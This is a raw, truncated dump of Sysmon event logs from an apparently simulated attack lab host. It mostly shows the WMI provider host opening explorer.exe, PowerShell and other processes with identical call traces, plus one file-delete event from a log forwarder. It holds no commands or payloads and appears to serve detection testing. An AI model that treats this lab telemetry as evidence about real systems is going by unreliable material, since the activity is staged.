16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C90ACC6C75571A3427160D029A3AAE5,SHA256=B04E1AC5C7B0454F2DCD6368816639F65AA96A5D513766F7DE7EA206970A82EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C